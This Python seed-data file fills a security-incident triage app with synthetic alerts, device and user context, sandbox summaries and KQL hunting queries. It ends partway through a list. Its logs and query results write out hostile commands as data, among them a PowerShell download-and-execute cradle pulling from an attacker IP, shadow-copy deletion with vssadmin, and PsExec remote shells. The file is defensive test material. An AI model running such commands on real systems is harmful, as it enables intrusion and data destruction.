"""Synthetic seed data matching the frontend's expected structure."""

import json
from sqlmodel import Session, select
from database import engine, init_db
from datetime import datetime
from models import (
    Incident, FileIntelligence, DeviceContext, UserContext,
    CampaignContext, MalwareAnalysis, KQLQuery,
)


INCIDENTS = [
    # --- Malicious Executable ---
    Incident(
        id="1234-ABCD-5678-EFGH",
        title="Malicious Executable Detected on Finance Workstation",
        detection_timestamp="2026-02-11 14:32:18 UTC",
        severity="HIGH",
        device_name="FIN-WS-027",
        user="ola.nordmann@company.com",
        file_name="supersusmalware.exe",
        file_hash="fb55414848281f804858ce188c3dc659d129e283bd62d58d34f6e6f568feab37",
        microsoft_signature="Trojan:Win32/Loader.ABCIml",
        quarantine_status="Successful",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.2.27",
        destination_ip="185.220.101.34",
        status="Open",
        command_line="supersusmalware.exe",
        file_path="C:\\Users\\ola\\Downloads\\supersusmalware.exe",
        logs_json=json.dumps([
            "Feb 11 14:31:02 FIN-WS-027 defender[1201]: File supersusmalware.exe written to C:\\Users\\ola\\Downloads\\",
            "Feb 11 14:31:04 FIN-WS-027 defender[1201]: Hash match: 9f2c6a9d...5a4 flagged Trojan:Win32/Loader.ABCIml",
            "Feb 11 14:31:05 FIN-WS-027 defender[1201]: Process supersusmalware.exe (PID 8832) attempted execution",
            "Feb 11 14:31:05 FIN-WS-027 defender[1201]: Outbound connection 10.14.2.27 -> 185.220.101.34:443 blocked",
            "Feb 11 14:31:06 FIN-WS-027 defender[1201]: File quarantined successfully",
            "Feb 11 14:32:18 FIN-WS-027 defender[1201]: Alert generated - severity HIGH",
        ]),
    ),
    # --- PowerShell Download Cradle ---
    Incident(
        id="9012-QRST-3456-UVWX",
        title="Suspicious PowerShell Download Cradle",
        detection_timestamp="2026-02-13 09:15:42 UTC",
        severity="CRITICAL",
        device_name="HR-LAPTOP-011",
        user="kari.hansen@company.com",
        file_name="update_check.ps1",
        file_hash="6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51",
        microsoft_signature="Behavior:Win32/SuspPowerShell.B",
        quarantine_status="Failed - Process Running",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.3.11",
        destination_ip="91.215.85.142",
        status="Open",
        command_line="powershell.exe -ExecutionPolicy Bypass -File update_check.ps1",
        file_path="C:\\Users\\kari\\AppData\\Local\\Temp\\update_check.ps1",
        logs_json=json.dumps([
            "Feb 13 09:14:30 HR-LAPTOP-011 outlook[3201]: Attachment saved: update_check.ps1",
            "Feb 13 09:15:01 HR-LAPTOP-011 powershell[5504]: Script execution: update_check.ps1",
            "Feb 13 09:15:02 HR-LAPTOP-011 powershell[5504]: IEX (New-Object Net.WebClient).DownloadString('http://91.215.85.142/payload')",
            "Feb 13 09:15:03 HR-LAPTOP-011 defender[1201]: Behavior:Win32/SuspPowerShell.B detected",
            "Feb 13 09:15:05 HR-LAPTOP-011 powershell[5504]: Connection established to 91.215.85.142:80",
            "Feb 13 09:15:10 HR-LAPTOP-011 defender[1201]: Quarantine FAILED - process 5504 still running",
            "Feb 13 09:15:42 HR-LAPTOP-011 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
    # --- Lateral Movement via PsExec ---
    Incident(
        id="3456-JKLM-7890-NOPQ",
        title="Lateral Movement via PsExec",
        detection_timestamp="2026-02-13 16:48:33 UTC",
        severity="CRITICAL",
        device_name="IT-ADMIN-004",
        user="admin.svc@company.com",
        file_name="psexec.exe",
        file_hash="142b638c6a60b60c7f9928da4fb85a5a8e1422a9ffdc9ee49e17e56ccca9cf6e",
        microsoft_signature="HackTool:Win32/PsExec",
        quarantine_status="Pending",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.1.4",
        destination_ip="10.14.2.27",
        status="Investigating",
        command_line="psexec.exe \\\\FIN-WS-027 -s cmd.exe",
        file_path="C:\\Windows\\Temp\\psexec.exe",
        logs_json=json.dumps([
            "Feb 13 16:45:01 IT-ADMIN-004 psexec[7201]: Remote execution initiated to FIN-WS-027 (10.14.2.27)",
            "Feb 13 16:45:02 IT-ADMIN-004 psexec[7201]: Service PSEXESVC installed on FIN-WS-027",
            "Feb 13 16:45:03 IT-ADMIN-004 psexec[7201]: Process cmd.exe started on FIN-WS-027 as SYSTEM",
            "Feb 13 16:46:15 IT-ADMIN-004 defender[1201]: HackTool:Win32/PsExec detected",
            "Feb 13 16:47:00 IT-ADMIN-004 psexec[7201]: Remote execution to HR-LAPTOP-011 (10.14.3.11)",
            "Feb 13 16:48:33 IT-ADMIN-004 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
    # --- Ransomware ---
    Incident(
        id="6543-RANS-0001-WXYZ",
        title="Ransomware File Encryption Detected on File Server",
        detection_timestamp="2026-02-15 02:14:33 UTC",
        severity="CRITICAL",
        device_name="FILE-SRV-002",
        user="svc.backup@company.com",
        file_name="winupdate32.exe",
        file_hash="c7f3a2e8b1d4f65a9c2eb8d1f4a7c0e3b6d9f2a5c8e1b4d7f0a3c6e9b2d5f8a1",
        microsoft_signature="Ransom:Win32/LockBit.A",
        quarantine_status="Failed - Mass File Operations In Progress",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.4.2",
        destination_ip="10.14.4.10",
        status="Open",
        command_line="winupdate32.exe",
        file_path="C:\\Windows\\Temp\\winupdate32.exe",
        logs_json=json.dumps([
            "Feb 15 02:10:01 FILE-SRV-002 defender[1201]: winupdate32.exe written to C:\\Windows\\Temp\\",
            "Feb 15 02:10:05 FILE-SRV-002 defender[1201]: Process winupdate32.exe (PID 9244) started as SYSTEM",
            "Feb 15 02:11:00 FILE-SRV-002 defender[1201]: Mass file rename detected - .lockbit extensions applied to 2,847 files",
            "Feb 15 02:11:05 FILE-SRV-002 cmd[9250]: vssadmin.exe delete shadows /all /quiet - shadow copies deleted",
            "Feb 15 02:11:10 FILE-SRV-002 defender[1201]: Ransom note LOCKBIT-README.txt dropped in 47 directories",
            "Feb 15 02:12:00 FILE-SRV-002 defender[1201]: Quarantine FAILED - mass file I/O in progress",
            "Feb 15 02:14:33 FILE-SRV-002 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
    # --- Network Worm ---
    Incident(
        id="8901-WORM-0003-EFGH",
        title="Network Worm Propagation via SMB Exploit",
        detection_timestamp="2026-02-16 07:03:18 UTC",
        severity="CRITICAL",
        device_name="DEV-WS-015",
        user="dev.user@company.com",
        file_name="mssecsvc.exe",
        file_hash="e1b4d7f0a3c6e9b2d5f8a1e4b7d0c3f6a9e2b5d8f1a4c7e0b3d6f9a2e5b8c1f4",
        microsoft_signature="Worm:Win32/WannaCrypt.A",
        quarantine_status="Failed - Lateral Spread Active",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.6.15",
        destination_ip="10.14.6.0/24",
        status="Open",
        command_line="mssecsvc.exe -m security",
        file_path="C:\\Windows\\mssecsvc.exe",
        logs_json=json.dumps([
            "Feb 16 07:00:01 DEV-WS-015 defender[1201]: Inbound SMB exploit attempt detected from 10.14.6.42",
            "Feb 16 07:00:04 DEV-WS-015 defender[1201]: EternalBlue exploit triggered - CVE-2017-0144",
            "Feb 16 07:00:06 DEV-WS-015 defender[1201]: mssecsvc.exe (PID 7801) dropped to C:\\Windows\\",
            "Feb 16 07:00:10 DEV-WS-015 defender[1201]: Worm:Win32/WannaCrypt.A identified",
            "Feb 16 07:01:00 DEV-WS-015 defender[1201]: Port scan initiated - 10.14.6.15 scanning 445/tcp across /24 subnet",
            "Feb 16 07:01:30 DEV-WS-015 defender[1201]: SMB exploit propagation attempts to 12 hosts on subnet",
            "Feb 16 07:03:18 DEV-WS-015 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
]


FILE_INTELLIGENCE = [
    # --- Malicious Executable ---
    FileIntelligence(
        file_hash="fb55414848281f804858ce188c3dc659d129e283bd62d58d34f6e6f568feab37",
        ms_classification="Malicious",
        ms_threat_family="Trojan:Win32/Loader.ABCIml",
        ms_prevalence="Medium",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="High confidence",
        seen_before="No",
        first_seen_internally="2026-02-11 14:31 UTC",
        last_seen_internally="2026-02-11 14:31 UTC",
        number_of_affected_devices="1",
        affected_devices_json=json.dumps(["FIN-WS-027"]),
        total_internal_detections="1",
        seen_across_customers="Yes",
        number_of_customer_environments="7",
        first_observed_across_customers="2026-02-10",
        spike_detected_last_24h="Yes",
        campaign_likelihood="High",
        df_classification="Malicious",
        df_threat_family="Trojan:Win32/Loader.ABCIml",
        df_prevalence="Medium",
        df_global_detection_level="Stable",
        df_cloud_protection_level="High confidence",
    ),
    # --- PowerShell Cradle ---
    FileIntelligence(
        file_hash="6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51",
        ms_classification="Malicious",
        ms_threat_family="Behavior:Win32/SuspPowerShell.B",
        ms_prevalence="Medium",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="High confidence",
        seen_before="No",
        first_seen_internally="2026-02-13 09:15 UTC",
        last_seen_internally="2026-02-13 09:15 UTC",
        number_of_affected_devices="1",
        affected_devices_json=json.dumps(["HR-LAPTOP-011"]),
        total_internal_detections="1",
        seen_across_customers="Yes",
        number_of_customer_environments="12",
        first_observed_across_customers="2026-02-12",
        spike_detected_last_24h="Yes",
        campaign_likelihood="High",
        df_classification="Malicious",
        df_threat_family="Behavior:Win32/SuspPowerShell.B",
        df_prevalence="Medium",
        df_global_detection_level="Stable",
        df_cloud_protection_level="High confidence",
    ),
    # --- PsExec ---
    FileIntelligence(
        file_hash="142b638c6a60b60c7f9928da4fb85a5a8e1422a9ffdc9ee49e17e56ccca9cf6e",
        ms_classification="HackTool",
        ms_threat_family="HackTool:Win32/PsExec",
        ms_prevalence="High",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="Low",
        seen_before="Yes",
        first_seen_internally="2025-06-01 08:00 UTC",
        last_seen_internally="2026-02-13 16:45 UTC",
        number_of_affected_devices="2",
        affected_devices_json=json.dumps(["IT-ADMIN-004", "IT-ADMIN-002"]),
        total_internal_detections="23",
        seen_across_customers="Yes",
        number_of_customer_environments="48",
        first_observed_across_customers="2019-03-14",
        spike_detected_last_24h="No",
        campaign_likelihood="Low",
        df_classification="HackTool",
        df_threat_family="HackTool:Win32/PsExec",
        df_prevalence="High",
        df_global_detection_level="Stable",
        df_cloud_protection_level="Low",
    ),
    # --- Ransomware ---
    FileIntelligence(
        file_hash="c7f3a2e8b1d4f65a9c2eb8d1f4a7c0e3b6d9f2a5c8e1b4d7f0a3c6e9b2d5f8a1",
        ms_classification="Malicious",
        ms_threat_family="Ransom:Win32/LockBit.A",
        ms_prevalence="High",
        ms_global_detection_level="Rising",
        ms_cloud_protection_level="High confidence",
        seen_before="No",
        first_seen_internally="2026-02-15 02:10 UTC",
        last_seen_internally="2026-02-15 02:10 UTC",
        number_of_affected_devices="1",
        affected_devices_json=json.dumps(["FILE-SRV-002"]),
        total_internal_detections="1",
        seen_across_customers="Yes",
        number_of_customer_environments="31",
        first_observed_across_customers="2026-01-20",
        spike_detected_last_24h="Yes",
        campaign_likelihood="High",
        df_classification="Malicious",
        df_threat_family="Ransom:Win32/LockBit.A",
        df_prevalence="High",
        df_global_detection_level="Rising",
        df_cloud_protection_level="High confidence",
    ),
    # --- Worm ---
    FileIntelligence(
        file_hash="e1b4d7f0a3c6e9b2d5f8a1e4b7d0c3f6a9e2b5d8f1a4c7e0b3d6f9a2e5b8c1f4",
        ms_classification="Malicious",
        ms_threat_family="Worm:Win32/WannaCrypt.A",
        ms_prevalence="Medium",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="High confidence",
        seen_before="Yes",
        first_seen_internally="2026-02-16 07:00 UTC",
        last_seen_internally="2026-02-16 07:00 UTC",
        number_of_affected_devices="3",
        affected_devices_json=json.dumps(["DEV-WS-015", "DEV-WS-016", "DEV-WS-019"]),
        total_internal_detections="3",
        seen_across_customers="Yes",
        number_of_customer_environments="44",
        first_observed_across_customers="2017-05-12",
        spike_detected_last_24h="Yes",
        campaign_likelihood="High",
        df_classification="Malicious",
        df_threat_family="Worm:Win32/WannaCrypt.A",
        df_prevalence="Medium",
        df_global_detection_level="Stable",
        df_cloud_protection_level="High confidence",
    ),
]


DEVICE_CONTEXTS = [
    # --- Existing ---
    DeviceContext(
        device_id="DEV-FIN-027",
        device_name="FIN-WS-027",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Workstation",
        risk_level="High",
        exposure_level="Medium",
        last_logged_on_user="ola.nordmann@company.com",
        failed_logons_last_24h=2,
        suspicious_processes_last_24h=3,
        beaconing_detected=True,
        credential_dumping_detected=False,
        last_seen=datetime(2026, 2, 11, 14, 32, 18),
    ),
    DeviceContext(
        device_id="DEV-HR-011",
        device_name="HR-LAPTOP-011",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Laptop",
        risk_level="Critical",
        exposure_level="High",
        last_logged_on_user="kari.hansen@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=5,
        beaconing_detected=True,
        credential_dumping_detected=True,
        last_seen=datetime(2026, 2, 13, 9, 15, 42),
    ),
    DeviceContext(
        device_id="DEV-IT-004",
        device_name="IT-ADMIN-004",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Workstation",
        risk_level="High",
        exposure_level="Medium",
        last_logged_on_user="admin.svc@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=2,
        beaconing_detected=False,
        credential_dumping_detected=False,
        last_seen=datetime(2026, 2, 13, 16, 48, 33),
    ),
    # --- New ---
    DeviceContext(
        device_id="DEV-FILE-SRV-002",
        device_name="FILE-SRV-002",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows Server 2022",
        device_type="Server",
        risk_level="Critical",
        exposure_level="High",
        last_logged_on_user="svc.backup@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=8,
        beaconing_detected=False,
        credential_dumping_detected=False,
        last_seen=datetime(2026, 2, 15, 2, 14, 33),
    ),
    DeviceContext(
        device_id="DEV-DEV-015",
        device_name="DEV-WS-015",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 10 21H2",
        device_type="Workstation",
        risk_level="Critical",
        exposure_level="High",
        last_logged_on_user="dev.user@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=6,
        beaconing_detected=False,
        credential_dumping_detected=False,
        last_seen=datetime(2026, 2, 16, 7, 3, 18),
    ),
]


USER_CONTEXTS = [
    # --- Existing ---
    UserContext(
        user_id="USR-001",
        user_principal_name="ola.nordmann@company.com",
        display_name="Ola Nordmann",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="High",
        sign_in_risk_level="Medium",
        failed_logins_last_24h=2,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["Finance Analyst"]),
        last_sign_in=datetime(2026, 2, 11, 14, 30, 0),
    ),
    UserContext(
        user_id="USR-003",
        user_principal_name="kari.hansen@company.com",
        display_name="Kari Hansen",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="High",
        sign_in_risk_level="Medium",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["HR Manager"]),
        last_sign_in=datetime(2026, 2, 13, 8, 45, 0),
    ),
    UserContext(
        user_id="USR-004",
        user_principal_name="admin.svc@company.com",
        display_name="Admin Service Account",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Critical",
        sign_in_risk_level="High",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=False,
        privileged_roles_json=json.dumps(["Domain Admin", "Global Admin"]),
        last_sign_in=datetime(2026, 2, 13, 16, 44, 0),
    ),
    # --- New ---
    UserContext(
        user_id="USR-006",
        user_principal_name="svc.backup@company.com",
        display_name="Backup Service Account",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Critical",
        sign_in_risk_level="High",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=False,
        privileged_roles_json=json.dumps(["Backup Operator", "Server Administrator"]),
        last_sign_in=datetime(2026, 2, 15, 2, 9, 0),
    ),
    UserContext(
        user_id="USR-008",
        user_principal_name="dev.user@company.com",
        display_name="Developer User",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Critical",
        sign_in_risk_level="High",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["Developer", "Local Admin"]),
        last_sign_in=datetime(2026, 2, 16, 6, 50, 0),
    ),
]


CAMPAIGN_CONTEXTS = [
    CampaignContext(
        campaign_id="CAMP-001",
        campaign_likelihood="High",
        spike_detected_last_24h=True,
        number_of_affected_devices=5,
        number_of_affected_users=5,
        number_of_customer_environments=8,
        first_observed=datetime(2026, 2, 9, 8, 0, 0),
        last_observed=datetime(2026, 2, 16, 13, 55, 0),
        related_hashes_json=json.dumps([
            "9f2c6a9d4c1e5b3a8f7e2d9c6a4b3e1f0c8d7a6b5e4c3f2d1a0b9c8d7e6f5a4",
            "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
            "c7f3a2e8b1d4f65a9c2eb8d1f4a7c0e3b6d9f2a5c8e1b4d7f0a3c6e9b2d5f8a1",
        ]),
        related_ips_json=json.dumps([
            "185.220.101.34",
            "91.215.85.142",
        ]),
        related_techniques_json=json.dumps([
            "T1059", "T1059.001", "T1570", "T1486", "T1543.003", "T1210", "T1555.003",
        ]),
    ),
]


MALWARE_ANALYSES = [
    # --- Existing ---
    MalwareAnalysis(
        file_hash="9f2c6a9d4c1e5b3a8f7e2d9c6a4b3e1f0c8d7a6b5e4c3f2d1a0b9c8d7e6f5a4",
        sandbox_score="92/100",
        behavior_summary="Drops secondary payload, establishes C2 via HTTPS to 185.220.101.34, attempts credential harvesting.",
        processes_spawned_json=json.dumps(["cmd.exe", "powershell.exe", "rundll32.exe"]),
        registry_changes_json=json.dumps([
            "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\UpdateSvc",
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\MalSvc",
        ]),
        network_connections_json=json.dumps(["185.220.101.34:443", "185.220.101.34:8080"]),
        persistence_detected=True,
        credential_access_detected=True,
        command_and_control_detected=True,
        analysis_timestamp=datetime(2026, 2, 11, 15, 0, 0),
    ),
    MalwareAnalysis(
        file_hash="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
        sandbox_score="88/100",
        behavior_summary="PowerShell download cradle fetches secondary payload from 91.215.85.142, executes in memory.",
        processes_spawned_json=json.dumps(["powershell.exe", "conhost.exe"]),
        registry_changes_json=json.dumps([
            "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PsUpdate",
        ]),
        network_connections_json=json.dumps(["91.215.85.142:80", "91.215.85.142:443"]),
        persistence_detected=True,
        credential_access_detected=False,
        command_and_control_detected=True,
        analysis_timestamp=datetime(2026, 2, 13, 10, 0, 0),
    ),
    MalwareAnalysis(
        file_hash="b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5",
        sandbox_score="35/100",
        behavior_summary="Legitimate Sysinternals PsExec tool used for remote administration. Dual-use risk.",
        processes_spawned_json=json.dumps(["psexesvc.exe", "cmd.exe"]),
        registry_changes_json=json.dumps([
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\PSEXESVC",
        ]),
        network_connections_json=json.dumps(["10.14.2.27:445", "10.14.3.11:445"]),
        persistence_detected=False,
        credential_access_detected=False,
        command_and_control_detected=False,
        analysis_timestamp=datetime(2026, 2, 13, 17, 0, 0),
    ),
    # --- New ---
    MalwareAnalysis(
        file_hash="c7f3a2e8b1d4f65a9c2eb8d1f4a7c0e3b6d9f2a5c8e1b4d7f0a3c6e9b2d5f8a1",
        sandbox_score="97/100",
        behavior_summary="LockBit ransomware variant. Enumerates and encrypts files with AES-256, deletes shadow copies via vssadmin, drops ransom note in all directories, and attempts SMB lateral spread.",
        processes_spawned_json=json.dumps(["vssadmin.exe", "cmd.exe", "net.exe", "wmic.exe"]),
        registry_changes_json=json.dumps([
            "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe",
            "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LockBitUpdate",
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LockBitSvc",
        ]),
        network_connections_json=json.dumps(["10.14.4.10:445", "10.14.4.1:445", "10.14.4.255:445"]),
        persistence_detected=True,
        credential_access_detected=False,
        command_and_control_detected=False,
        analysis_timestamp=datetime(2026, 2, 15, 3, 0, 0),
    ),
    MalwareAnalysis(
        file_hash="e1b4d7f0a3c6e9b2d5f8a1e4b7d0c3f6a9e2b5d8f1a4c7e0b3d6f9a2e5b8c1f4",
        sandbox_score="95/100",
        behavior_summary="WannaCry-variant worm exploits EternalBlue (CVE-2017-0144) to propagate via SMB port 445. Encrypts files after successful exploitation and scans the subnet for additional vulnerable hosts.",
        processes_spawned_json=json.dumps(["mssecsvc.exe", "tasksche.exe", "cmd.exe", "attrib.exe", "icacls.exe"]),
        registry_changes_json=json.dumps([
            "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\tasksche",
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\mssecsvc2.0",
        ]),
        network_connections_json=json.dumps(["10.14.6.19:445", "10.14.6.31:445", "10.14.6.42:445", "10.14.6.50:445"]),
        persistence_detected=True,
        credential_access_detected=False,
        command_and_control_detected=False,
        analysis_timestamp=datetime(2026, 2, 16, 8, 0, 0),
    ),
]


KQL_QUERIES = [
    # ---- FIN-WS-027 (Malicious Executable) ----
    KQLQuery(
        query_name="Outbound C2 connections",
        query_description="Detect outbound connections to known C2 IP from the affected device.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'FIN-WS-027'\n| where RemoteIP == '185.220.101.34'\n| project Timestamp, RemoteIP, RemotePort, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 0, 0),
        result_count=4,
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemotePort", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:05", "185.220.101.34", "443", "supersusmalware.exe"],
            ["2026-02-11 14:31:08", "185.220.101.34", "443", "supersusmalware.exe"],
            ["2026-02-11 14:31:12", "185.220.101.34", "8080", "rundll32.exe"],
            ["2026-02-11 14:31:30", "185.220.101.34", "443", "powershell.exe"],
        ]),
    ),
    KQLQuery(
        query_name="File write events",
        query_description="Find all file creation events in the Downloads folder around the time of detection.",
        kql_statement="DeviceFileEvents\n| where DeviceName == 'FIN-WS-027'\n| where FolderPath has 'Downloads'\n| where Timestamp between (datetime(2026-02-11 14:00) .. datetime(2026-02-11 15:00))\n| project Timestamp, FileName, FolderPath, SHA256, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 10, 0),
        result_count=2,
        result_columns_json=json.dumps(["Timestamp", "FileName", "FolderPath", "SHA256", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:02", "supersusmalware.exe", "C:\\Users\\ola\\Downloads\\", "fb554148...feab37", "chrome.exe"],
            ["2026-02-11 14:31:04", "config.dat", "C:\\Users\\ola\\Downloads\\", "a3e8f201...9bc412", "supersusmalware.exe"],
        ]),
    ),
    KQLQuery(
        query_name="Process execution timeline",
        query_description="List all processes spawned on the device in the hour surrounding the incident.",
        kql_statement="DeviceProcessEvents\n| where DeviceName == 'FIN-WS-027'\n| where Timestamp between (datetime(2026-02-11 14:00) .. datetime(2026-02-11 15:00))\n| project Timestamp, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName\n| sort by Timestamp asc",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 15, 0),
        result_count=5,
        result_columns_json=json.dumps(["Timestamp", "FileName", "ProcessCommandLine", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:02", "chrome.exe", "chrome.exe --download", "ola.nordmann"],
            ["2026-02-11 14:31:05", "supersusmalware.exe", "supersusmalware.exe", "ola.nordmann"],
            ["2026-02-11 14:31:06", "cmd.exe", "cmd.exe /c whoami", "ola.nordmann"],
            ["2026-02-11 14:31:08", "powershell.exe", "powershell -enc SQBFAFgA...", "ola.nordmann"],
            ["2026-02-11 14:31:12", "rundll32.exe", "rundll32.exe config.dat,Start", "ola.nordmann"],
        ]),
    ),

    # ---- HR-LAPTOP-011 (PowerShell Download Cradle) ----
    KQLQuery(
        query_name="PowerShell download cradle activity",
        query_description="Identify PowerShell processes using DownloadString or IEX patterns.",
        kql_statement="DeviceProcessEvents\n| where FileName == 'powershell.exe'\n| where ProcessCommandLine has_any ('DownloadString', 'IEX', 'Invoke-Expression')\n| project Timestamp, DeviceName, AccountName, ProcessCommandLine",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 30, 0),
        result_count=2,
        result_columns_json=json.dumps(["Timestamp", "DeviceName", "AccountName", "ProcessCommandLine"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:15:02", "HR-LAPTOP-011", "kari.hansen", "IEX (New-Object Net.WebClient).DownloadString('http://91.215.85.142/payload')"],
            ["2026-02-13 09:15:18", "HR-LAPTOP-011", "kari.hansen", "powershell -enc JABjAD0ATgBlAHcALQBPAGIA..."],
        ]),
    ),
    KQLQuery(
        query_name="Network connections from PowerShell",
        query_description="Find all outbound network connections initiated by PowerShell on the device.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'HR-LAPTOP-011'\n| where InitiatingProcessFileName == 'powershell.exe'\n| project Timestamp, RemoteIP, RemotePort, RemoteUrl",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 35, 0),
        result_count=5,
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemotePort", "RemoteUrl"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:15:03", "91.215.85.142", "80", "http://91.215.85.142/payload"],
            ["2026-02-13 09:15:05", "91.215.85.142", "80", "http://91.215.85.142/config"],
            ["2026-02-13 09:15:20", "91.215.85.142", "443", "https://91.215.85.142/c2"],
            ["2026-02-13 09:16:01", "91.215.85.142", "443", "https://91.215.85.142/exfil"],
            ["2026-02-13 09:17:30", "91.215.85.142", "443", "https://91.215.85.142/c2"],
        ]),
    ),
    KQLQuery(
        query_name="Email attachment origin",
        query_description="Trace the email attachment that delivered the malicious script to the user.",
        kql_statement="EmailAttachmentInfo\n| where RecipientEmailAddress == 'kari.hansen@company.com'\n| where FileName == 'update_check.ps1'\n| project Timestamp, SenderFromAddress, Subject, FileName, SHA256",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 40, 0),
        result_count=1,
        result_columns_json=json.dumps(["Timestamp", "SenderFromAddress", "Subject", "FileName", "SHA256"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:12:44", "it-support@c0mpany-updates.com", "Urgent: System Update Required", "update_check.ps1", "a1b2c3d4...f0a1b2"],
        ]),
    ),

    # ---- IT-ADMIN-004 (Lateral Movement via PsExec) ----
    KQLQuery(
        query_name="PsExec lateral movement",
        query_description="Track PsExec service installation events across the network.",
        kql_statement="DeviceProcessEvents\n| where FileName == 'psexesvc.exe' or InitiatingProcessFileName == 'psexec.exe'\n| project Timestamp, DeviceName, AccountName, FileName, RemoteDeviceName",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 0, 0),
        result_count=4,
        result_columns_json=json.dumps(["Timestamp", "DeviceName", "AccountName", "FileName", "RemoteDeviceName"]),
        result_rows_json=json.dumps([
            ["2026-02-13 16:45:01", "IT-ADMIN-004", "admin.svc", "psexec.exe", "FIN-WS-027"],
            ["2026-02-13 16:45:02", "FIN-WS-027", "SYSTEM", "psexesvc.exe", ""],
            ["2026-02-13 16:47:00", "IT-ADMIN-004", "admin.svc", "psexec.exe", "HR-LAPTOP-011"],
            ["2026-02-13 16:47:01", "HR-LAPTOP-011", "SYSTEM", "psexesvc.exe", ""],
        ]),
    ),
    KQLQuery(
        query_name="SMB connections from admin workstation",
        query_description="List all SMB (port 445) connections originating from the admin workstation.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'IT-ADMIN-004'\n| where RemotePort == 445\n| project Timestamp, RemoteIP, RemoteDeviceName, InitiatingProcessFileName, AccountName",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 5, 0),
        result_count=4,
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemoteDeviceName", "InitiatingProcessFileName", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-13 16:44:58", "10.14.2.27", "FIN-WS-027", "psexec.exe", "admin.svc"],
            ["2026-02-13 16:45:02", "10.14.2.27", "FIN-WS-027", "psexec.exe", "admin.svc"],
            ["2026-02-13 16:46:55", "10.14.3.11", "HR-LAPTOP-011", "psexec.exe", "admin.svc"],
